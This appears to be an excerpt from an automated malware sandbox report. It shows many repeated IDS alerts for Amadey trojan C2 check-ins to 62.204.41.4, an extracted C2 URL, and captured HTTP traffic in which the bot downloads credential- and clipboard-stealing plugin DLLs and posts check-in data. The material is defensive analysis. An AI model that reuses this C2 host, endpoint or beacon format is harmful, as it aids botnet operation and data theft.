                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49868 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49869 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49870 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49871 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49872 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49873 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49874 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49875 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49876 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49877 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49878 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49879 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49880 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49881 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49882 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49883 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49884 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49885 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49886 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49887 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49888 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49889 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49890 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49891 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49892 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49893 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49894 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49895 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49896 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49897 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49898 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49899 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49900 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49901 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49902 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49903 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49904 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49905 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49906 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49907 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49908 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49909 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49910 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49911 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49912 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49913 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49914 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49915 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49916 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49917 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49918 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49919 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49920 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49921 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49922 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49923 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49924 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49925 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49926 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49927 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49928 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49929 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49930 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49932 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49933 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49934 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49935 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49936 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49937 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49938 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49939 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49940 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49941 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49942 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49943 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49944 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49945 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49946 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49947 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49948 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49949 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49950 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49951 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49952 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49953 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49954 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49955 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49956 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49957 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49958 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49959 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49960 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49961 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49962 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49963 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49964 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49965 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49966 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49967 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49968 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49969 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49970 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49971 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49972 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49973 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49974 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49975 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49976 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49977 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49978 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49979 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49980 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49981 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49982 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49983 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49984 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49985 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49986 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49987 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49988 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49989 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49990 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49991 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49992 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49993 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49994 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49995 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49996 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49997 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49998 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49999 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50000 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50001 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50002 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50003 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50004 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50005 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50006 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50007 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50008 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50009 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50010 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50011 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50012 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50013 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50014 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50015 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50016 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50017 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50018 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50019 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50020 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50021 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50022 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50023 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50024 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50025 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50026 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50027 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50028 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50029 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50030 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50031 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50032 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50033 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50034 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50035 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50036 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50037 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50038 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50039 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50040 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:50041 -> 62.204.41.4:80
                              Source: Malware configuration extractor URLs: 62.204.41.4/Gol478Ns/index.php
                              Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1 Host: 62.204.41.4
                              Source: global traffic HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 91 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1 Host: 62.204.41.4
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
